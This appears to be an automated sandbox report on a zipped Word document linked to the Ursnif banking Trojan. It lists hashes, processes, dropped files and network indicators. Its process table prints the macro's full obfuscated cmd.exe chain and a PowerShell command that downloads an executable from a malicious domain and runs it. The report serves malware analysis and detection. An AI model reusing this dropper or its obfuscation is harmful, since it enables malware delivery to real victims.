File name: | medspeed (2).doc.zip |
Full analysis: | https://app.any.run/tasks/fe97de7e-2eab-42ab-bed3-b2ea99dbbd0d |
Verdict: | Malicious activity |
Threats: | Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world. |
Analysis date: | December 14, 2018, 19:23:49 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | A8BCBF6EC8CC5653765B44FB265AAD56 |
SHA1: | C9680B01E9C41AE63A7162F5D1ACA63085915AD1 |
SHA256: | 31E5E6581870447EB6BAAAA92028C170AA75B85DC54E2E454DB492FAED151190 |
SSDEEP: | 1536:0JvUl7u2JOzLxgnGsbhaH+SnP19C2brlHCBL:0Jsl7u2y2nxhA3P19COli1 |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0009 |
ZipCompression: | Deflated |
ZipModifyDate: | 2018:12:14 15:51:09 |
ZipCRC: | 0x8f9f1f4f |
ZipCompressedSize: | 56585 |
ZipUncompressedSize: | 99456 |
ZipFileName: | medspeed (2).doc |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2712 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\medspeed (2).doc.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
1960 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2712.44989\medspeed (2).doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2812 | c:\oZzsJWRbs\IUdaVvlQoCSFQH\GIjUYAfoFd\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set iRrc=jPVrnEdazsdkkJXOWCPMowLqYzQUiBZ;)+G/=2x,Ap h9cbe80uR-?KFyI{\l:t$(S@vNfTmg1D'.}&&for %1 in (63,27,57,12,36,75,14,60,40,75,31,63,15,71,34,36,4,47,21,52,20,46,0,47,45,62,42,68,47,62,76,16,47,46,17,60,28,47,4,62,31,63,2,5,46,36,75,43,62,62,41,61,35,35,56,50,60,7,21,4,47,9,9,47,76,45,20,71,35,62,56,45,60,7,71,35,69,3,47,9,9,3,76,41,43,41,53,60,36,21,56,72,38,73,37,76,62,12,4,75,76,65,41,60,28,62,64,75,66,75,32,31,63,26,71,16,36,75,51,21,0,75,31,63,22,17,54,42,36,42,75,48,44,73,75,31,63,28,25,7,36,75,16,51,50,75,31,63,51,20,16,36,63,47,4,67,61,62,47,71,41,33,75,59,75,33,63,22,17,54,33,75,76,47,38,47,75,31,69,20,3,47,7,45,43,64,63,25,4,28,42,28,4,42,63,2,5,46,32,58,62,3,56,58,63,15,71,34,76,74,20,21,4,60,20,7,10,55,28,60,47,64,63,25,4,28,39,42,63,51,20,16,32,31,63,30,68,71,36,75,28,23,30,75,31,57,69,42,64,64,34,47,62,52,57,62,47,71,42,63,51,20,16,32,76,60,47,4,72,62,43,42,52,72,47,42,48,49,49,49,49,32,42,58,57,4,67,20,12,47,52,57,62,47,71,42,63,51,20,16,31,63,23,40,34,36,75,62,50,0,75,31,46,3,47,7,12,31,77,77,45,7,62,45,43,58,77,77,63,70,28,19,36,75,43,45,2,75,31,83)do set zgLp=!zgLp!!iRrc:~%1,1!&&if %1 gtr 82 powershell.exe "!zgLp:~-339!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3368 | CmD /V:ON/C"set iRrc=jPVrnEdazsdkkJXOWCPMowLqYzQUiBZ;)+G/=2x,Ap h9cbe80uR-?KFyI{\l:t$(S@vNfTmg1D'.}&&for %1 in (63,27,57,12,36,75,14,60,40,75,31,63,15,71,34,36,4,47,21,52,20,46,0,47,45,62,42,68,47,62,76,16,47,46,17,60,28,47,4,62,31,63,2,5,46,36,75,43,62,62,41,61,35,35,56,50,60,7,21,4,47,9,9,47,76,45,20,71,35,62,56,45,60,7,71,35,69,3,47,9,9,3,76,41,43,41,53,60,36,21,56,72,38,73,37,76,62,12,4,75,76,65,41,60,28,62,64,75,66,75,32,31,63,26,71,16,36,75,51,21,0,75,31,63,22,17,54,42,36,42,75,48,44,73,75,31,63,28,25,7,36,75,16,51,50,75,31,63,51,20,16,36,63,47,4,67,61,62,47,71,41,33,75,59,75,33,63,22,17,54,33,75,76,47,38,47,75,31,69,20,3,47,7,45,43,64,63,25,4,28,42,28,4,42,63,2,5,46,32,58,62,3,56,58,63,15,71,34,76,74,20,21,4,60,20,7,10,55,28,60,47,64,63,25,4,28,39,42,63,51,20,16,32,31,63,30,68,71,36,75,28,23,30,75,31,57,69,42,64,64,34,47,62,52,57,62,47,71,42,63,51,20,16,32,76,60,47,4,72,62,43,42,52,72,47,42,48,49,49,49,49,32,42,58,57,4,67,20,12,47,52,57,62,47,71,42,63,51,20,16,31,63,23,40,34,36,75,62,50,0,75,31,46,3,47,7,12,31,77,77,45,7,62,45,43,58,77,77,63,70,28,19,36,75,43,45,2,75,31,83)do set zgLp=!zgLp!!iRrc:~%1,1!&&if %1 gtr 82 powershell.exe "!zgLp:~-339!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2900 | powershell.exe "$UIk='XlA';$OmG=new-object Net.WebClient;$VEb='http://yulawnesse.com/tyclam/fressr.php?l=wygx12.tkn'.Split('@');$QmW='Rwj';$LCK = '891';$iza='WRu';$RoW=$env:temp+'\'+$LCK+'.exe';foreach($zni in $VEb){try{$OmG.DownloadFile($zni, $RoW);$ZNm='iqZ';If ((Get-Item $RoW).length -ge 80000) {Invoke-Item $RoW;$qAG='tuj';break;}}catch{}}$TiM='hcV';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC68F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34FB235E.wmf | — | |
MD5:— | SHA256:— | |||
1960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6929871C.wmf | — | |
MD5:— | SHA256:— | |||
2900 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ILXYYMHEQYKT9LV5523M.temp | — | |
MD5:— | SHA256:— | |||
2712 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb2712.44989\medspeed (2).doc | document | |
MD5:D15C24E37442AA44FD46446DD03B3AB0 | SHA256:37A030DDA47C0C9B3EFF43731064CD7255BC7C89FF73C9F2A82F8BCC111BF441 | |||
1960 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:9124A3E84BD2E7930C8BB12E82CF705B | SHA256:0BAA9F823F2AEB98DF0B18BD9B41DA0C98F0DF9E07EE09BA291DFCBD8F9BB12B | |||
2900 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
1960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50CA2E91.wmf | wmf | |
MD5:40B1BF403CABEBD566194CB529360ECA | SHA256:BCE2EA42889A7C18EFFBB88B181D16BD0E6AC2E5FDAA78DCC5CD553760195B41 | |||
2900 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13d2f3.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
1960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIb2712.44989\~$dspeed (2).doc | pgc | |
MD5:8078761AE0732B1D58F73A8AFFEC80EF | SHA256:452FD2D14E742F591E657C17A6E94E17FE4689DF3FE1373377A52A15C2F7F5E8 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2900 | powershell.exe | GET | 404 | 78.155.220.222:80 | http://yulawnesse.com/tyclam/fressr.php?l=wygx12.tkn | RU | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2900 | powershell.exe | 78.155.220.222:80 | yulawnesse.com | OOO Network of data-centers Selectel | RU | malicious |
Domain | IP | Reputation |
---|---|---|
yulawnesse.com |
| malicious |